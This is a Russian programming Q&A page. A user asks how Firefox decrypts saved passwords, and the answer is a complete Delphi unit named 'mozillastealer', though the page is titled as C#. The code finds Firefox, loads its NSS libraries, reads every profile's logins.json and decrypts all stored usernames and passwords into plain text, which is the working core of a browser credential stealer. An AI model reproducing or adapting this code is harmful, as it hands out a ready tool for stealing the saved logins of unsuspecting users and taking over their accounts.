Расшифровать пароли Firefox - C#
Формулировка задачи:
Подскажите пожалуйста, по какому алгоритму происходит расшифровка в Firefox, знаю что вся необходимая инфа лежит в файлах logins.json, key3.db и cert8.db, но самого алгоритма найти не могу
Решение задачи: «Расшифровать пароли Firefox»
textual
Листинг программы
unit mozillastealer;
interface
uses
windows;
function getMozilla(): string;
implementation
var
version,
FireFoxPath: string;
function GetFileList(const Path: String): string;
var a: Cardinal;
fa: _WIN32_FIND_DATAA;
begin
result:='';
TRY
a:=FindFirstFile(PansiChar(path+PChar('\*.*')),fa);
while FindNextFile(a,fa) do
result:=result+fa.cFileName+#13#10;
EXCEPT
END;
end;
procedure GetFFInfos;
begin
FireFoxPath:='';
TRY
if pos('Mozilla Firefox', GetFileList('c:\Program Files (x86)\'))<>0 then FireFoxPath:='C:\Program Files (x86)\Mozilla Firefox\';
if pos('Mozilla Firefox', GetFileList('c:\Program Files'))<>0 then FireFoxPath:='C:\Program Files\Mozilla Firefox\';
EXCEPT
END;
end;
Function Splitter(Texto, Delimitador: String; Indice: integer): string;
var
DelimiPos, i: integer;
begin
for i:= 1 to indice do
begin
DelimiPos:= pos(Delimitador,Texto);
if DelimiPos <> 0 then
Delete(Texto, 1, DelimiPos + length(Delimitador) -1);
end;
DelimiPos:= pos(Delimitador,Texto);
if DelimiPos <> 0 then
Texto:= Copy(Texto,1,delimipos -1);
SetLength(Result, Length(Texto));
Result:= Texto;
end;
function Pars(T_, ForS, _T: string): string;
var a, b:integer;
begin
Result := '';
if (T_='') or (ForS='') or (_T='') then Exit;
a:=Pos(T_, ForS);
if a=0 then Exit else a:=a+Length(T_);
ForS:=Copy(ForS, a, Length(ForS)-a+1);
b:=Pos(_T, ForS);
if b>0 then
Result:=Copy(ForS, 1, b - 1);
end;
Function GetFile(const FileName : AnsiString) : AnsiString;
Var
F : File;
FSize : Longint;
begin
Result:='';
if GetFileAttributes(Pchar(FileName)) = DWORD($FFFFFFFF) then exit;
FileMode:=0;
AssignFile ( F, FileName);
Reset(F, 1);
FSize:=FileSize(F);
SetLength(Result,FSize);
BlockRead(F, Result[1],FSize);
CloseFile(F);
FileMode:=2;
end;
function ParseMozJSON(j: string): string;
var
data, it, ress: string;
begin
data:=GetFile(j);
data:=Pars(',"logins":[{',data,'}],"disabledHosts":[],"version":1}');
while pos(',"hostname":"', data)<> 0 do
begin
it:= Pars(',"hostname":"', data, 'timesUsed":');
ress:=ress + copy(it, 1, pos('","',it)-1);
delete(it, 0, pos('encryptedUsername":"', it));
ress:=ress + '<|>'+Pars('encryptedUsername":"',it,'","');
delete(it, 0, pos('encryptedPassword":"', it));
ress:=ress + '<|>'+Pars('encryptedPassword":"',it,'","')+#13#10;
delete(data, 1, pos('timesUsed":',data));
end;
result:=ress;
end;
function getMozilla(): string;
type
TSECItem = packed record
SECItemType: dword;
SECItemData: pchar;
SECItemLen: dword;
end;
PSECItem = ^TSECItem;
var
NSSModule: THandle;
hToken: THandle;
NSS_Init: function(configdir: pchar): dword; cdecl;
NSSBase64_DecodeBuffer: function(arenaOpt: pointer; outItemOpt: PSECItem; inStr: pchar; inLen: dword): dword; cdecl;
PK11_GetInternalKeySlot: function: pointer; cdecl;
PK11_Authenticate: function(slot: pointer; loadCerts: boolean; wincx: pointer): dword; cdecl;
PK11SDR_Decrypt: function(data: PSECItem; result: PSECItem; cx: pointer): dword; cdecl;
NSS_Shutdown: procedure; cdecl;
PK11_FreeSlot: procedure(slot: pointer); cdecl;
ProfilePath: array [0..MAX_PATH] of char;
ProfilePathLen: dword;
FirefoxProfilePath: pchar;
MainProfile: array [0..MAX_PATH] of char;
MainProfilePath: pchar;
EncryptedSECItem: TSECItem;
DecryptedSECItem: TSECItem;
KeySlot: pointer;
i:integer;
username, password: string;
V: Extended;
buffer, huyufer: string;
a: Cardinal;
fa: _WIN32_FIND_DATAA;
begin
TRY
try
GetFFInfos;
except
end;
try
if FireFoxPath = '' then exit;
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'mozglue.dll'));
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'mozcrt19.dll'));
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'mozutils.dll'));
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'nspr4.dll'));
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'plc4.dll'));
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'plds4.dll'));
except
end;
try
LoadLibrary(pchar(FirefoxPath + 'nssutil3.dll'));
except
end;
try
NSSModule := LoadLibrary(pchar(FirefoxPath + 'nss3.dll'));
except
end;
try
@NSS_Init := GetProcAddress(NSSModule, pchar('NSS_Init'));
except
end;
try
@NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, pchar('NSSBase64_DecodeBuffer'));
except
end;
try
@PK11_GetInternalKeySlot := GetProcAddress(NSSModule, pchar('PK11_GetInternalKeySlot'));
except
end;
try
@PK11_Authenticate := GetProcAddress(NSSModule, pchar('PK11_Authenticate'));
except
end;
try
@PK11SDR_Decrypt := GetProcAddress(NSSModule, pchar('PK11SDR_Decrypt'));
except
end;
try
@NSS_Shutdown := GetProcAddress(NSSModule, pchar('NSS_Shutdown'));
except
end;
try
@PK11_FreeSlot := GetProcAddress(NSSModule, pchar('PK11_FreeSlot'));
except
end;
try
OpenProcessToken(GetCurrentProcess, TOKEN_QUERY, hToken);
except
end;
try
ProfilePathLen := MAX_PATH;
except
end;
try
ZeroMemory(@ProfilePath, MAX_PATH);
except
end;
try
GetEnvironmentVariable('APPDATA', ProfilePath, ProfilePathLen);
except
end;
try
FirefoxProfilePath := pchar(profilePath +'\Mozilla\Firefox\profiles.ini');
except
end;
try
GetPrivateProfileString('Profile0', 'Path', '', MainProfile, MAX_PATH, FirefoxProfilePath);
except
end;
a:=FindFirstFile(PansiChar(profilePath + '\Mozilla\Firefox\Profiles\'+PChar('\*.*')),fa);
while FindNextFile(a,fa) do
if GetFileAttributes(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json')) <> DWORD($FFFFFFFF) then
try
if NSS_Init(pchar(profilePath + '\Mozilla\Firefox\' + mainProfile)) = 0 then
begin
KeySlot := PK11_GetInternalKeySlot;
if KeySlot <> nil then
begin
if PK11_Authenticate(KeySlot, True, nil) = 0 then
begin
huyufer:=ParseMozJSON(PChar(profilePath + '\Mozilla\Firefox\Profiles\'+fa.cFileName+'\logins.json'));
while pos(#13#10, huyufer)<>0 do
BEGIN
buffer:=copy(huyufer, 0, pos(#13#10, huyufer));
delete(huyufer, 1, pos(#13#10, huyufer)+1);
ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));
result := result + 'URL:'+#$9+Splitter(buffer, '<|>', 0) + #13#10;
username:= Splitter(buffer, '<|>', 1);
Password := Splitter(buffer, '<|>', 2);
NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Username), Length(Username));
PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
Result := result + 'LOG:'+#$9+DecryptedSECItem.SECItemData + #13#10;
ZeroMemory(@EncryptedSECItem, SizeOf(EncryptedSECItem));
ZeroMemory(@DecryptedSECItem, SizeOf(DecryptedSECItem));
NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Password), Length(Password));
PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil);
Result := result + 'PWD:'+#$9+DecryptedSECItem.SECItemData + #13#10+ #13#10;
END;
end else result:= result + '';
PK11_FreeSlot(KeySlot);
end else
result:= result + '';
NSS_Shutdown;
end else
result:= result + '';
except
end;
EXCEPT
END;
end;
end.
ИИ поможет Вам:
- решить любую задачу по программированию
- объяснить код
- расставить комментарии в коде
- и т.д